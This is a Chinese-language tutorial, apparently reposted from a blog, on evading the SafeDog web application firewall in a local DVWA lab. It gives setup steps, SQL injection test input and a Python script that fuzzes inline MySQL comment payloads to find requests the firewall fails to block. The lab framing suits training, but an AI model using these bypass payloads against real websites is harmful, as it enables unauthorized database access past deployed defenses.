0


绕过安全狗

本节我们想要绕过的安全狗版本为v4.023957 ,它是网站安全狗的Apache版。

首先搭建环境。渗透环境选用DVWA漏洞集成环境,下载地址

http://www.dvwa.co.uk/ 。DVWA是一款集成的渗透测试演练环境,当刚刚入门 并且找不到合适的靶机时,可以使用DVWA ,它的搭建非常简便。如图8-1所示为 DVWA的下载页面。
fe5fd2216ce2412690cc3f9d07e418b3.png
图8-1 下载DVWA

下载完的文件是一个个压缩包,因为DVWA是建立在PHP和MySQL上的Web 漏洞测试环境,所以还需要一个由PHP和MySQL组成的Web服务才能正常运作。

通过下载网站环境phpStudy程序完成搭建,下载地址为小皮面板(phpstudy) - 让天下没有难配的服务器环境!。 安装完成后访问127.0.0.1查看服务是否开启,如图8-2所示。

063a1f5718c34b15b7df0c2bd46dd95f.png
图8-2 访问页面

将DVWA的压缩包解压到phpStudy的www 目录下。首先重置一下phpStudy的 MySQL密码,如图8-3所示。

93923d988c73440bbc81dabe6c26cec3.png
图8-3 重置密码

这里将密码设置为root 。此时再找到DVWA目录下的配置文件,将

DVWA/config下的config.inc.php.dist修改为config.inc.php 。打开config.inc.php ,将 其中的数据库用户名和密码修改为正确的,如图8-4所示。

47aff254383b40df85f7b08680289c9f.png
图8-4 修改配置文件

修改后保存。进入127.0.0.1/dvwa 目录便可正常显示登录界面。DVWA的默认 账户密码为admin/password。

接下来切换一下漏洞环境的难度。进入DVWA Security选项页面,将 Impossible换成Low ,点击Submit按钮,如图8-5所示。

df92f2a309734f76b093aa7a2170b28c.png
图8-5 设置等级

最后安装安全狗,可从官网(网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改)下 载。选择Windows操作系统,Apache版4.0版本,按默认选项安装即可。

安装完成后,首先尝试一下没有开启安全狗时的正常注入返回。选择SQL

Injection为SQL注入环境。在User ID框内输入1会正常返回数据,但输 入“ 1’and‘ 1’” 时会返回SQL错误语句。如下所示:
4460cc10cf69499fbc6565a038658be8.png
会出现这个错误是因为1后面的单引号被注入了本身正常的SQL查询语句中, 导致SQL查询语句出现错误,并返回到页面中。这表示此处可能存在SQL注入 点。在开启安全狗防护后执行一些SQL语句,便有不一样的返回,如图8-6所示。

这说明SQL注入语句已被安全狗检测出并且拦截掉了。下面我们就来编写一 个简单的模糊测试绕安全狗脚本。
b548eedd7aba46f3843a03d35e97638c.png
图8-6 安全狗拦截

首先抓取返回时安全狗页面的数据包和发送的数据,如果模糊测试发送数据 后返回的不是安全狗的页面,则表明已经绕过了安全狗,如图8-7所示。
f18097653b5a47dab9b9e4222187c8f5.png
图8-7 抓包

依据抓包信息编写如下脚本,发送一个请求包,其中含有抓取到的cookie,

因为这个页面是通过get传参的,所以模糊测试只需构造到URL中的参数进行测试 即可。通过模糊测试后,判断返回的页面是否为安全狗拦截显示的页面,使用页 面中返回的“攻击请求”进行判断,不存在这4个字,则表示已经绕过了安全狗:
55e574016e074f6fb9000cf431addc1e.png
import requests

#设置cookie

cookies = "security=low; PHPSESSID=6arlml0daogk8s5p23qgm2bvb4"

#设置协议头

headers = {

"User-Agent" : "Mozilla/5 .0 (Macintosh; Intel Mac OS X 10_13_2)

AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/63 .0 .3239 .84

Safari/537 .36",

"Cookie" : "security=low; PHPSESSID=6arlml0daogk8s5p23qgm2bvb4"

}

#循环FUZZ

for i in range(10000,15000) :

reture = "http://10 .211 .55 .3/dvwa/vulnerabilities/sqli/?id=1%27%2F*

%21" + str(i) + "and*%2F+%27a%27%3D%27a+--%2B&Submit=Submit"

r = requests .get(reture, headers=headers) .text

key = "攻击请求"

ss = r .find(key)

if ss == -1 :

print("fuzz is ok!url is :")

print(reture)

模糊测试脚本运行出来的结果如下所示,这些链接都是已经能够绕过安全狗 的。

绕过安全狗的效果如图8-8所示。

1f3b30e788284a0bba517939dd01cdb0.png

图8-8 绕过安全狗

这里提示已经成功绕过安全狗,完成注入。

标签: 笔记

本文转载自: https://blog.csdn.net/m0_62207482/article/details/135682174
版权归原作者 Lyx-0607 所有, 如有侵权,请联系我们删除。

“绕过安全狗”的评论:

还没有评论